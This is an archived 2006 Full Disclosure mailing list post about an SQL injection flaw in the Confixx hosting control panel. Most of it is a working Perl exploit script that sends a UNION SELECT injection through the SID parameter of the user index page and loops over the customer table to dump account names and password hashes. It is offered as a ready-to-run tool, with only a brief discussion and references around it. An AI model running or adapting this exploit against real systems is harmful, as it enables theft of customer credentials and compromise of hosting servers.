Full Disclosure mailing list archives

Confixx Index.PHP SQL Injection Vulnerability (Exploit - not new vuln)

From: defa <defa () systemli org>
Date: Wed, 19 Apr 2006 00:00:59 +0200

Here is more information on the confixx vuln released by LoK Crew.Sorry for the poor quality of this posting, I was short of time.


Product:
^^^^^^^

Confixx is a comprehensive control panel that provides the bestvalue, proven quality, fully developed feature set and qualitysupport. The software’s powerful features have been especiallydesigned to meet the requirements of hosting providers.

More -> http://www.swsoft.com/en/products/confixx/

Risk: High - eventually remote root access
^^^^

Serverity: High
^^^^^^^^

Discussion:
^^^^^^^^^^^

The vuln itself can be found in the html/session.inc.php in thefunction sessao_read( $sKey ) which is used to overwrite the php-ownsession methods.The file "loginform.php" can be used to display e.g. admin hashes.Read the rest by studying the attached exploit.


Reference:
^^^^^^^^^^
Vuln was published by LoK-Crew here:
http://venom.sam-city.com/confixx2.txt

Read more:
^^^^^^^^^^^
http://www.securityfocus.com/bid/17476/


Code:
^^^^^

--------------- <snip> -------------

#!/usr/bin/perl
use IO::Socket;

if (@ARGV < 1)
{
print q(
exploit by defa (2006)
=========================
confixx_exploit.pl [URL]
params:
  [URL] - server url
);
exit;
}

$serv  = $ARGV[0];
$serv =~ s/(http:\/\/)//eg;

for ($i=0;$i<=100;$i++)
{
#$i=1;
$hit = 0;
$url = "http://";;
$url .= $serv;
$url .= "/user/index.php?SID=1'%20AND%200=1%20UNION%20SELECT%20CONCAT";

$url .= "('_error|s:',length(longpw)%2Blength(kunde)%2B8,':%22','HIT:%20',";$url .= "kunde,'%20:%20',longpw,'%22;')%20AS%20'sdata'%20FROM%20kunden%20LIMIT%20";

$url .= "$i,1/*";

$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr =>"localhost", PeerPort => "80") || die "[-] CONNECT FAILED\r\n";



print  $socket "GET $url HTTP/1.1\n";
print  $socket "Host: $serv\n";
print  $socket 'User-Agent: confixx_exploit'."\n";
print $socket "Connection: close\n\n";
while ($answer = <$socket>)
{
if ($answer =~ /<p>HIT:/)
        {
                # $answer =~ s/<[A-Z,a-z,=].+>//g;
                print "$answer";
                $hit = 1;
        }

}
if ($hit == 0) {die("that's it");}
}

--------------- <snap> -------------

bye
defa

--
don't eat yellow snow



_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Current thread:

Confixx Index.PHP SQL Injection Vulnerability (Exploit - not new vuln) defa (Apr 18)
- Re: Confixx Index.PHP SQL ... UPDATE defa (Apr 18)
- Re: Confixx Index.PHP SQL Injection Vulnerability (Exploit - not new vuln) defa (Apr 19)